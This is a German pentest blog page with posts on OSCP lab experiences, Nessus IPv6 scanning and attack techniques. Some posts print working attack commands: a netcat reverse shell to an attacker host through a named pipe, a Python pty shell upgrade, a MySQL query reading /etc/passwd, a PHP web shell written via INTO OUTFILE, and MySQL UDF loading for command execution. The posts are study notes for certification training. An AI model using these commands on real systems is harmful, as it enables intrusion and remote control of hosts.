Pentest – Seite 3 – InfoSec Blog | Patrick Sauer & Dominik Sauer

Erfahrungen zum OSCP: Teil 8 Report fürs Lab

24. Februar 2014 by Patrick Sauer Leave a Comment

Nachdem die meisten Systeme eingenommen sind, wollte ich mit dem Penetration Test Report vom Labor beginnen. Ich hatte bisher meine Dokumentation stichpunkthaft mit Keepnote verfasst. Ich muss zugegeben, ich hätte entweder die Dokumentation parallel zum Hacken im Labor gleich erstellen oder zumindest die Inhalte in Keepnote besser aufbereiten sollen. So muss ich mir wahrscheinlich die meisten Systeme nochmal kurz ansehen. Das war leider keine optimale Vorgehensweise. Ich kann im Nachhinein nur empfehlen, gleich vom Beginn ab mehr Aufwand in den notwendigen Bericht zu stecken.

Erfahrungen zum OSCP: Teil 7 Neustart 2014 nach längerer Pause

20. Februar 2014 by Patrick Sauer Leave a Comment

Nicht nur mein letzter Blog-Eintrag zum OSCP-Kurs ist aus November 2013, ich hatte in letzter Zeit auch nichts mehr dafür gemacht. Zudem lief mein Lab-Zugang im Dezember aus. Jetzt geht’s wieder los: 30-Tage-Verlängerung vom Lab geordert. Ziel: OSCP im März!

Schwachstellen/Vulnerability Scan mit Nessus und IPv6

6. Februar 2014 by Patrick Sauer Leave a Comment

Nessus von Tenable Networks Security ist ein bekannter Vulnerability Scanner / Schwachstellen-Scanner zur Analyse eines Netzwerks auf bekannte Schwachstellen. Nessus kann hierbei nicht nur mit gewöhnlichen IPv4-Adressen umgehen, sondern beherrscht auch IPv6.

Grundsätzlich ist es durch die extrem hohe Anzahl von möglichen Adressen bei IPv6 nicht möglich ganze Netze zu scannen. Aber man kann Nessus Listen von IPv6-Adressen übergeben, die er auf mögliche Schwachstellen analysiert. Dabei sollte man die Option „ping scan“ in der eigenen Scan Policy tunlichst deaktivieren. Sobald diese aktiviert ist, scheint Nessus nicht mehr alle übergebenen IPv6-Adressen zu scannen und/oder bricht vorher ab. Die Ursache für das Verhalten ist mir nicht bekannt, ich hatte die Probleme selbst und wurde vom Support darauf aufmerksam gemacht.

Erfahrungen zum OSCP: Teil 6 Manchmal kann es so simpel sein

16. November 2013 by Patrick Sauer Leave a Comment

Manchmal kann es so simpel sein. Ich hatte auf einem Linux-Host eine nicht-privilegierte Reverse-Shell per netcat erlangt. Neben root existierte noch ein weiterer User. Nachdem ich mehrere Stunden erfolglos Zeit in die Privilege Escalation über Exploits investiert hatte, war ich kurz vorm Aufgeben für diesen Tag.

Aus purer Verzweiflung wagte ich ein „su username“ und gab einfach als Passwort den Benutzernamen ein. Nicht nur hatte das Erfolg, der Benutzer hatte auch uneingeschränkte sudo-Rechte auf diesem Host. In weniger als einer Minute war ich root.

Wenn man selbst sehr sensibilisiert mit dem Umgang von Passwörtern ist und weiß, wie man sichere Passwörter benutzt und auch einen Passwortsafe verwendet, verschränkt es manchmal ungemein den eigenen Blickwinkel. Irgendwann kommt man nicht mehr intuitiv auf die Idee, dass trivialste Passwort zu versuchen. Manchmal ist es wirklich so simpel.

Interaktive Reverse-Shell mit Netcat durch Python

16. November 2013 by Patrick Sauer Leave a Comment

Eine Reverse-Shell mit netcat ist leider nicht interaktiv. Somit sind Tools wie sudo, mysql, su usw. nicht oder nur eingeschränkt benutzbar. Sofern auf dem Zielrechner Python installiert ist, lässt sich innerhalb der Netcat-Session einfach ein Terminal simulieren:

python -c ‚import pty; pty.spawn(„/bin/bash“)‘

Hacking MySQL: MySQL-Server als root

3. November 2013 by Patrick Sauer Leave a Comment

Dienste unnötigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders dämlich ist sie bei MySQL. Über LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische Möglichkeiten zur Verfügung, die sich auch problemlos über SQL Injections nutzen lassen:

SELECT LOAD_FILE(„/etc/passwd“);

SELECT ‚<?php system($_REQUEST[‚cmd‘]); ?>‘ INTO OUTFILE ‚/var/www/webshell.php

Diese beiden Funktionalitäten lassen zwar schon genug Schaden zu, es geht aber noch eine Stufe härter: Über MySQL User Defined Functions (UDF) lassen sich beliebige shell-Kommandos ausführen. Das Tool sqlmap beinhaltet die notwendigen Libs im Ordner udf. Die korrekte Lib auf den Server nach /tmp/ laden und aktivieren:

mysql> use mysql;

mysql> create table abc(line blob);

mysql> insert into abc values(load_file(‚/tmp/lib_mysqludf_sys.so‘));

mysql> select * from abc into dumpfile ‚/usr/lib/lib_mysqludf_sys.so‘;

mysql> create function sys_exec returns integer soname ‚lib_mysqludf_sys.so‘;

mysql> select sys_exec(‚touch /test‘);

Privilege escalation by MySQL…

Unprivilegierter User-Account in Kali Linux

31. Oktober 2013 by Patrick Sauer Leave a Comment

So direkt kann ich nicht nachvollziehen, warum Backtrack bzw. jetzt Kali Linux ihre Penetration Tester konsequent als root arbeiten lassen. Ein unprivilegierter User-Account und die Nutzung von sudo wären meiner Ansicht nach die bessere Wahl. Man benutzt schließlich als Sicherheitsspezialist eine Linux-Distribution, die genauso angegriffen werden kann wie man selbst Systeme angreift.

Einen lokalen Nutzer anlegen:

adduser localuser

usermod -G sudo localuser

Remote-Shell mit Netcat ohne „-e“ exec

28. Oktober 2013 by Patrick Sauer Leave a Comment

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:

kali# nc -nvlp 4444

host# mknod /tmp/pipe p

host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe

Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..

Erfahrungen zum OSCP: Teil 5 Es zieht sich.

27. Oktober 2013 by Patrick Sauer Leave a Comment

Mein aktueller Stand:

5x privilegierte Rechte
6x unprivilegierte Rechte
Freischaltung DEV- und IT-Netz

Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen.

Es fühlt sich ein klein wenig an, als würde ich wieder eine wissenschaftliche Abschlussarbeit schreiben. Der OSCP ist sicherlich interessanter, keine Frage. Parallelen gibt es dennoch. Ohne Ausdauer und Ehrgeiz ist auch der OSCP nicht zu schaffen. Insbesondere wenn man noch recht am Anfang ist und mehr als die Hälfte noch vor sich hat.

Ich schätze, dass ich bis zum Ende mehr Zeit investieren werde, als für die Vorbereitungen auf CISSP, CISM, TISP usw. zusammen. Der OSCP bringt 40 CPE für CISSP und CISM – das ist ein lachhafter Wert. Wer den OSCP in 40 Stunden inklusive Prüfung und Dokumentation erfolgreich hinter sich bringt, hat meine Bewunderung verdient. Ich halte das für nahezu unmöglich.

Erfahrungen zum OSCP: Teil 4 Reverten tut gut

17. Oktober 2013 by Patrick Sauer Leave a Comment

Über das eigene Labpanel kann man beim OSCP Server in ihren Ausgangszustand zurückversetzen (reverten). Man kann zwar selbst jeden Tag nur eine begrenzte Anzahl von Servern reverten, dennoch lohnt es sich, dieses vor einem Angriff durchzuführen.

Andere OSCP-Studenten hinterlassen eventuell defekte Applikationen oder Files wie Webshells, die einen eigenen Angriff entweder beeinträchtigen können oder zumindest das Potential haben für Verwirrung zu sorgen.